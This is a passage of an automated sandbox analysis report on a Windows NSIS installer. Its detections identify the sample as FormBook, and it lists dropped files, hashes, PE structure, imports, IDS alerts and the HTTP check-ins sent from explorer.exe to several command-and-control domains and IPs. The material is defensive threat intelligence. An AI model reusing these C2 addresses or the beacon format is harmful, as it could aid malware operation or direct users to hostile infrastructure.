                                      Preview: .....=.3m.y..".RO7]..^.i..0...l.M..?.......f.UkZod..Zg@3......U...u...E<./..+.@6.../...XP.f...^GO...aA#jO.~.="g(.f....Tk......Q.^[L.9...}.......E..]9...?ro.0fFi..o..?. ..R...m....Vr..?.1..htVEJ...-..q....'i..D.d.(...K.A..z;...."..jX..y.qw.P"<....I..*\.)..6........'.....@...m...9..]V......)M.D38..1.w.h^..T.K.P.....UM.,Z..Ds.y.....I..s.h`;S...I....Y.mK7...4..2.}]./..>c!.~D........4.V...J...L..2.j.....o..h..R`..#.J.....n!....G.L.z..r.Y.......<s.M.[.....<X..=.+....D2....z...}.......3......(.>H..%O..;x....p...H...{.E..F.1.L..?Ld..Q....g{.+.h%.^4@...V.3._..pa@s...u...-.h...i,.#-...u...v..e-..3...Vk.=f8$,.K.a...O..fShD.J.T..{9.....88a.......O../X..D5*....W7.F..&W...w..........v.T.}I&.XT]..... .T.g[.}>)%Q....V..N....Z.Y..)~W.Z....>....g..]dA...'...T\.e..*..Y.-S.s._.y3..:....r......@.v]9.p'...&..@...x..D>u#.>.%.jO..\...<..4..K..@..Q.W......9..[cO.j/...Y.dX.B.r..A.nk.c.>.&..,_....H]...P+s7....^n..Eg.*o.(...X.;.b{H$>...7.f..R.....pK.:R{.......T^<.tJ
C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll
Process: C:\Users\user\Desktop\Y4U48592345670954.exe
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4096
Entropy (8bit): 4.1271255992731
Encrypted: false
SSDEEP: 48:vpghendHRWgTJzDrscX/oh/jTLNuLebdsbriB4ZYmRz:BYIWcxtXghrnktfiuZVR
MD5: 823D8D2962EF7A632F256759B088FFF8
SHA1: 263245E0C8D9EF7FACDE174BE1CEE3FAA9A846BA
SHA-256: 7DDF5362A2603771F85D4CE7341B647FE839005820F52C47B3391D38F839E89F
SHA-512: 6563CA17DE1820B7DED3D39B106D0C0FB4C8BBC3EF2A5B88DDBD30FA8C2A4CBDB521D5C6960281B930BAA126F2FE637CB605ECA2EC4C3709AD16AC63E2B3D3D2
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 6%
Reputation: low
                                      Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...L.n`...........!.........................................................`............@.......................... ..U....!.......@.......................P..L...$ ..............................................("...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..L....P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\sn7trv7b4c9aukp2
Process: C:\Users\user\Desktop\Y4U48592345670954.exe
File Type: data
Category: dropped
Size (bytes): 6661
Entropy (8bit): 7.966207593101436
Encrypted: false
SSDEEP: 192:qdeemJBzAS2B25DiXlBUrBKli0qLnnZAvAVnHd:SepQB2FSbUF6snZbVHd
MD5: 9C2EE18B684CD1990D6BB0140F48B8EF
SHA1: D2AC6BFA52B3DB413E8FFEB941DA0A8CC6ABE263
SHA-256: 1723655FB6D497AC55E316181F4243F8CF2D49578C714F8997DAC9966D71659E
SHA-512: BC5DAF45130DB66C1E5A86880F3F3B49E9313F14B10C165FBC87A5702014B668AE7559D4B1958F7CF41941B6B6DF674E15C78379B607CC600C4B007CC4368C14
Malicious: false
Reputation: low
                                      Preview: ...I|..Q...p.P....W.....b..vc........j. .T?..Rg.k..+.gWC.c.[.3..s.`.X.0.n.oeM].5.{.|2Yj..BSx../-g..?Y}.~<d4..LW...A.9...]...>.6...kT.MK.C....Y.ZH...#..V.W.... ..c.d.8..-..`.i......e...%.t.4..M.*.y..1....'y...6..|.t~...C...q....@.#j...&L.M.p{..sU.~.~P......zV....W.....y_.P.T^..PP.N..h.vR[m.3.[.U.adY.Q<.^.d...._9.k.c.;Uy.zhf`..8cv.w-:e..=i...:.2..Jg...7./..G-...D8<...;R.SIKA...AO.PFL>....\.U./K....a.b....+..^._....(..k.l...#.r..2.MT..p.../-...\.g.;<......78....BC..A....?..=.AJ...M..)A.2w.:.M.,....qQ...F..U..,....Y]...U..+....,'..l.... U.N..+.!,.'4.lr.s./....h(.,.p..\ .=..0p.,.x..D0...0.[..~..|,S..G..8..V....,[.R....T..4.v.S...[."...G(N. .K..sM.g.^.+3.`..]e(m..q..w..3.oo=5...*d.y,2...8y...6....9.....#....*>H........)mU...(zO.....[....r]...G..w..0..YH.....6.T_..Y.J....)...fVD...>3..(r.u..u./%q.nW.pp.....Ur.xw..c.....J.eL.~...6.7.7...Q.......:....T...O.P...U....U.".UW.dabb...bd.G.._...i....gf..4.....~4..qP..1...n<.=...B..B.B.

                                      Static File Info

                                      General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.919280210748743
TrID:
• Win32 Executable (generic) a (10002005/4) 92.16%
• NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Y4U48592345670954.exe
File size: 227550
MD5: e8e69391d3a931e6638adaebf6a339f6
SHA1: 29c02e786c6f8b343bc0f05a1195ff5215d21e63
SHA256: 20087dfd9482120735e4e37edc7307b91264632b0c9c7b50a058c100ba186ece
SHA512: da123a74a0e598d6d1e1886d18a1141da3ea6403e03984e01a2ffc76723ccc3837cf8dc652bbeae2e435278e321a9b31ed434a79215a6b67fe7c81524b1fde5e
SSDEEP: 6144:HdliJDX8Ai9mv9eMy6VP+xNYkm0spiNGU:jiB8AiEVeJF
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                      File Icon

Icon Hash: b2a88c96b2ca6a72

                                      Static PE Info

                                      General

Entrypoint: 0x40314a
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 18bc6fa81e19f21156316b1ae696ed6b

                                      Entrypoint Preview

                                      Instruction
                                      sub esp, 0000017Ch
                                      push ebx
                                      push ebp
                                      push esi
                                      xor esi, esi
                                      push edi
                                      mov dword ptr [esp+18h], esi
                                      mov ebp, 00409240h
                                      mov byte ptr [esp+10h], 00000020h
                                      call dword ptr [00407030h]
                                      push esi
                                      call dword ptr [00407270h]
                                      mov dword ptr [007A3030h], eax
                                      push esi
                                      lea eax, dword ptr [esp+30h]
                                      push 00000160h
                                      push eax
                                      push esi
                                      push 0079E540h
                                      call dword ptr [00407158h]
                                      push 00409230h
                                      push 007A2780h
                                      call 00007FA960977D68h
                                      mov ebx, 007AA400h
                                      push ebx
                                      push 00000400h
                                      call dword ptr [004070B4h]
                                      call 00007FA9609754A9h
                                      test eax, eax
                                      jne 00007FA960975566h
                                      push 000003FBh
                                      push ebx
                                      call dword ptr [004070B0h]
                                      push 00409228h
                                      push ebx
                                      call 00007FA960977D53h
                                      call 00007FA960975489h
                                      test eax, eax
                                      je 00007FA960975682h
                                      mov edi, 007A9000h
                                      push edi
                                      call dword ptr [00407140h]
                                      call dword ptr [004070ACh]
                                      push eax
                                      push edi
                                      call 00007FA960977D11h
                                      push 00000000h
                                      call dword ptr [00407108h]
                                      cmp byte ptr [007A9000h], 00000022h
                                      mov dword ptr [007A2F80h], eax
                                      mov eax, edi
                                      jne 00007FA96097554Ch
                                      mov byte ptr [esp+10h], 00000022h
                                      mov eax, 00000001h

                                      Rich Headers

                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804

                                      Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7344 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x900 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                      Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x59de | 0x5a00 | False | 0.681293402778 | data | 6.5143386598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x10f2 | 0x1200 | False | 0.430338541667 | data | 5.0554281206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x39a034 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3ac000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94574916515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x3ac190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x3ac478 | 0x100 | data | English | United States
RT_DIALOG | 0x3ac578 | 0x11c | data | English | United States
RT_DIALOG | 0x3ac698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x3ac6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x3ac710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                      Imports

DLL | Import
KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                      Possible Origin

Language of compilation system | Country where language is spoken
English | United States

                                      Network Behavior

                                      Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/08/21-12:28:02.299363 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49766 | 34.102.136.180 | 192.168.2.4
04/08/21-12:28:25.088543 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49769 | 34.102.136.180 | 192.168.2.4
04/08/21-12:28:43.295202 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 34.102.136.180
04/08/21-12:28:43.295202 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 34.102.136.180
04/08/21-12:28:43.295202 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 34.102.136.180
04/08/21-12:28:43.409063 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49770 | 34.102.136.180 | 192.168.2.4

                                      Network Port Distribution

                                      TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 8, 2021 12:27:41.465953112 CEST | 49760 | 80 | 192.168.2.4 | 69.163.220.52
Apr 8, 2021 12:27:41.620493889 CEST | 80 | 49760 | 69.163.220.52 | 192.168.2.4
Apr 8, 2021 12:27:41.620574951 CEST | 49760 | 80 | 192.168.2.4 | 69.163.220.52
Apr 8, 2021 12:27:41.620716095 CEST | 49760 | 80 | 192.168.2.4 | 69.163.220.52
Apr 8, 2021 12:27:41.775491953 CEST | 80 | 49760 | 69.163.220.52 | 192.168.2.4
Apr 8, 2021 12:27:41.775533915 CEST | 80 | 49760 | 69.163.220.52 | 192.168.2.4
Apr 8, 2021 12:27:41.775551081 CEST | 80 | 49760 | 69.163.220.52 | 192.168.2.4
Apr 8, 2021 12:27:41.775660992 CEST | 49760 | 80 | 192.168.2.4 | 69.163.220.52
Apr 8, 2021 12:27:41.775732994 CEST | 49760 | 80 | 192.168.2.4 | 69.163.220.52
Apr 8, 2021 12:27:41.931611061 CEST | 80 | 49760 | 69.163.220.52 | 192.168.2.4
Apr 8, 2021 12:28:02.170397043 CEST | 49766 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:02.183226109 CEST | 80 | 49766 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:02.183315039 CEST | 49766 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:02.183496952 CEST | 49766 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:02.196137905 CEST | 80 | 49766 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:02.299362898 CEST | 80 | 49766 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:02.299391031 CEST | 80 | 49766 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:02.299635887 CEST | 49766 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:02.299704075 CEST | 49766 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:02.312124014 CEST | 80 | 49766 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:24.894125938 CEST | 49769 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:24.908015013 CEST | 80 | 49769 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:24.908196926 CEST | 49769 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:24.908379078 CEST | 49769 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:24.925878048 CEST | 80 | 49769 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:25.088542938 CEST | 80 | 49769 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:25.088572025 CEST | 80 | 49769 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:25.088747025 CEST | 49769 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:25.089088917 CEST | 49769 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:25.101531029 CEST | 80 | 49769 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:43.282567024 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:43.294913054 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:43.295043945 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:43.295202017 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:43.307471991 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:43.409063101 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:43.409204960 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4
Apr 8, 2021 12:28:43.409269094 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:43.409306049 CEST | 49770 | 80 | 192.168.2.4 | 34.102.136.180
Apr 8, 2021 12:28:43.423803091 CEST | 80 | 49770 | 34.102.136.180 | 192.168.2.4

                                      UDP Packets


                                      DNS Queries

                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                      Apr 8, 2021 12:27:41.262495995 CEST | 192.168.2.4 | 8.8.8.8 | 0x88a3 | Standard query (0) | www.contecoliving.com | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:28:02.128470898 CEST | 192.168.2.4 | 8.8.8.8 | 0xa1d3 | Standard query (0) | www.identityofplace.com | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:28:24.871767044 CEST | 192.168.2.4 | 8.8.8.8 | 0x36 | Standard query (0) | www.constipationhub.com | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:28:43.241204977 CEST | 192.168.2.4 | 8.8.8.8 | 0xc57d | Standard query (0) | www.tententacleshydro.com | A (IP address) | IN (0x0001)

                                      DNS Answers

                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                      Apr 8, 2021 12:27:41.459153891 CEST | 8.8.8.8 | 192.168.2.4 | 0x88a3 | No error (0) | www.contecoliving.com | | 69.163.220.52 | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:28:02.168994904 CEST | 8.8.8.8 | 192.168.2.4 | 0xa1d3 | No error (0) | www.identityofplace.com | identityofplace.com | | CNAME (Canonical name) | IN (0x0001)
                                      Apr 8, 2021 12:28:02.168994904 CEST | 8.8.8.8 | 192.168.2.4 | 0xa1d3 | No error (0) | identityofplace.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:28:24.892980099 CEST | 8.8.8.8 | 192.168.2.4 | 0x36 | No error (0) | www.constipationhub.com | constipationhub.com | | CNAME (Canonical name) | IN (0x0001)
                                      Apr 8, 2021 12:28:24.892980099 CEST | 8.8.8.8 | 192.168.2.4 | 0x36 | No error (0) | constipationhub.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:28:43.281166077 CEST | 8.8.8.8 | 192.168.2.4 | 0xc57d | No error (0) | www.tententacleshydro.com | tententacleshydro.com | | CNAME (Canonical name) | IN (0x0001)
                                      Apr 8, 2021 12:28:43.281166077 CEST | 8.8.8.8 | 192.168.2.4 | 0xc57d | No error (0) | tententacleshydro.com | | 34.102.136.180 | A (IP address) | IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.contecoliving.com
                                      • www.identityofplace.com
                                      • www.constipationhub.com
                                      • www.tententacleshydro.com

                                      HTTP Packets

                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      0 | 192.168.2.4 | 49760 | 69.163.220.52 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Apr 8, 2021 12:27:41.620716095 CEST | 2074 | OUT | GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D HTTP/1.1
                                      Host: www.contecoliving.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:27:41.775533915 CEST | 2075 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Thu, 08 Apr 2021 10:27:41 GMT
                                      Server: Apache
                                      Location: https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D
                                      Content-Length: 346
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6e 74 65 63 6f 6c 69 76 69 6e 67 2e 63 6f 6d 2f 6b 6c 66 2f 3f 4b 58 36 78 4d 3d 30 72 6a 50 6f 66 71 68 53 5a 66 58 66 30 55 70 26 61 6d 70 3b 2d 5a 56 78 59 38 48 3d 75 5a 32 77 2b 5a 34 6a 49 70 5a 62 49 53 58 45 56 4f 30 6e 6e 6c 63 70 63 5a 71 4f 58 73 45 5a 35 65 7a 76 63 4f 51 46 58 75 31 4e 4f 4e 37 45 33 2f 44 58 67 71 68 33 47 44 76 6f 51 43 74 37 71 38 35 44 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&amp;-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D">here</a>.</p></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      1 | 192.168.2.4 | 49766 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Apr 8, 2021 12:28:02.183496952 CEST | 5879 | OUT | GET /klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1
                                      Host: www.identityofplace.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:28:02.299362898 CEST | 5879 | IN | HTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:28:02 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "6063a886-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      2 | 192.168.2.4 | 49769 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Apr 8, 2021 12:28:24.908379078 CEST | 5899 | OUT | GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 HTTP/1.1
                                      Host: www.constipationhub.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:28:25.088542938 CEST | 5899 | IN | HTTP/1.1 403 Forbidden
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:28:24 GMT
                                      Content-Type: text/html
                                      Content-Length: 275
                                      ETag: "605db497-113"
                                      Via: 1.1 google
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
